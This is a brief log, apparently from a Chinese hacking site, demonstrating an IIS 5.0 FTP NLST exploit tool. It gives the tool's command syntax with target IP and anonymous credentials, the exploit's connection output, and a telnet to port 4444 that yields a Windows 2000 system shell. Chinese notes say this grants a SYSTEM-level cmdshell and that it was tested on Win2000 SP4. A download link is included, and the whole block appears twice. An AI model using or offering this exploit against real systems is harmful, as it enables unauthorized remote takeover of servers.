usage: iisftpexp.exe
Sample:iisftpexp.exe 192.168.1.110 21 192.168.1.111 anonymous anonymous
[-] Exiting...
C:\>iisftpexp.exe 192.168.1.110 21 192.168.1.111 anonymous anonymous
IIS5.0 FTP NLST Exploit by friddy just for test
open local port:24934
[+] Connecting...
[+] Sending USER...
Try NLST
try:telnet 192.168.1.110 4444
C:\>telnet 192.168.1.110 4444
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
成功后telnet 对方的4444端口就能拿到个SYSTEM权限的cmdshell.
Win2000sp4英文版测试成功.
http://www.hackbase.com/soft/2009-09-06/20968.html
Sample:iisftpexp.exe 192.168.1.110 21 192.168.1.111 anonymous anonymous
[-] Exiting...
C:\>iisftpexp.exe 192.168.1.110 21 192.168.1.111 anonymous anonymous
IIS5.0 FTP NLST Exploit by friddy just for test
open local port:24934
[+] Connecting...
[+] Sending USER...
Try NLST
try:telnet 192.168.1.110 4444
C:\>telnet 192.168.1.110 4444
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
成功后telnet 对方的4444端口就能拿到个SYSTEM权限的cmdshell.
Win2000sp4英文版测试成功.
http://www.hackbase.com/soft/2009-09-06/20968.html


